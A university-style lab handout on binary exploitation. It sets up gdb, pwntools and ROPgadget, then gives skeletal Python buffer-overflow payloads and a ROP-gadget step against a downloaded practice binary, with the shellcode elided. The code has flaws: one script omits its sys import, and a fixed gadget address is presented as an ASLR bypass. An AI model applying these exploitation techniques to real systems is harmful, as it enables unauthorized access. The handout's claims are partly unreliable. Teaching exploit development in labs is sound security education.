Exploit Development & Binary Exploitation Lab

Overview

This lab focuses on offensive security techniques involving binary exploitation and exploit development. Students will learn how to analyze vulnerable binaries, manipulate memory, and craft custom exploits to gain unauthorized access.

What You Will Learn

Understanding memory corruption vulnerabilities (buffer overflows, format string exploits, heap exploitation)
Using debuggers to analyze binary behavior
Writing custom exploits in Python
Bypassing security protections like ASLR and DEP

Lab Instructions

1. Setting Up Your Environment

You will need:

A Debian or Kali Linux VM (VirtualBox, WSL, or cloud-based instance)
Python3 installed (sudo apt update && sudo apt install python3)
Exploitation tools: gdb, pwntools, radare2, gef, ROPgadget

Install required tools:

sudo apt install gdb gdb-multiarch python3-pwntools radare2 ropgadget

2. Identifying Vulnerabilities in a Binary

Step 1: Download the vulnerable binary

wget https://example.com/vuln_binary -O vuln_binary
chmod +x vuln_binary

Step 2: Analyze the binary

gdb -q vuln_binary

checksec vuln_binary  # Check security protections
run  # Execute the binary and observe behavior

3. Exploiting a Buffer Overflow

Step 1: Fuzzing Input to Find Overflow Point

#!/usr/bin/python3
import sys
import struct

offset = 100  # Modify based on test results
payload = b"A" * offset + struct.pack("<I", 0xdeadbeef)  # Overwrite return address

sys.stdout.buffer.write(payload)

Save as exploit.py and run:

python3 exploit.py | ./vuln_binary

4. Bypassing ASLR with ROP Chains

Step 1: Generate a ROP chain

ROPgadget --binary vuln_binary --only "pop|ret"

Step 2: Modify exploit to include ROP gadgets

import struct

pop_ret = struct.pack("<I", 0x08048484)  # Example gadget address
shellcode = b"\x90" * 16 + b"..."  # Inject shellcode

payload = b"A" * 100 + pop_ret + shellcode
sys.stdout.buffer.write(payload)

Run again:

python3 exploit.py | ./vuln_binary

Final Submission

Submit a Google Doc with screenshots of your completed tasks.
Ensure each screenshot has a caption explaining what was accomplished.
Follow submission guidelines as provided by your instructor.

🚀 Congratulations! You’ve completed the Exploit Development & Binary Exploitation Lab! 🚀

Exploit Development & Binary Exploitation Lab#

Overview#

What You Will Learn#

Lab Instructions#

1. Setting Up Your Environment#

Install required tools:#

2. Identifying Vulnerabilities in a Binary#

Step 1: Download the vulnerable binary#

Step 2: Analyze the binary#

3. Exploiting a Buffer Overflow#

Step 1: Fuzzing Input to Find Overflow Point#

4. Bypassing ASLR with ROP Chains#

Step 1: Generate a ROP chain#

Step 2: Modify exploit to include ROP gadgets#

Final Submission#